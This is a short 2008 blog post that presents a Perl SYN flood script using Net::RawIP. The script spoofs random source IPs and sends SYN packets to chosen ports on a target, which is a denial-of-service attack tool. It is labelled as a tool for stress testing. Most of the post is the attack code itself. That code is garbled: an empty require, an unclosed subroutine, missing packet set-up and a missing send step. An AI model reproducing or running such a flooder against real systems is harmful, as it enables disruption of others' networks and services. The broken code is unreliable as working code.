Saturday, April 26, 2008

SYN flooder

This is a pretty simple SYN flooder - spoofs source IP's and ports, super effective. I wrote this for stress testing services on my network.

#!/usr/bin/perl -w
# this is a proof of concept syn flooder written in Perl.
# it's pretty straight forward. sends packets with the syn flag
# enabled, causing half open connections sent from random spoofed IP's.
# one addition is the ability to specify a list of ports, rather than just
# targeting a single port.
# don't use this for any malicious purposes.. it's strictly for stress
# testing routers/networks.
# - nwo 10/17/2007

require '';

### need to utilize raw sockets.
use Net::RawIP;

### function to create random IP's.
sub randip () {
$ip = join(".", map int rand 256, 1 .. 4);

### set up the socket.
$syn = new Net::RawIP;

die "Usage: $0 -t (target) -p (port) -n (number of packets)\n"
unless ($opt_t && $opt_p && $opt_n);
### allow the user to specify a list of comma seperated ports via the command line.
@ports = split(/\,/, $opt_p);
$list = @ports;

### super awesome output.
print "Hitting $opt_t on port(s) @ports with $opt_n packets....\n";

### start the loop
for($i = 1;$i < $opt_n;$i++) {
### randomly select a port out of the @ports array
$nlist = int rand($list);
$dport = $ports[$nlist];

### set up the packet..
ip => {
daddr => $opt_t,
saddr => &randip,

### specify the destination port and source port..
### make sure the syn flag is enabled.
tcp => {
dest => $dport,
source => $dport,
ack => 0,
urg => 0,
rst => 0,
fin => 0,
psh => 0,
syn => 1
### send the packet! yay!

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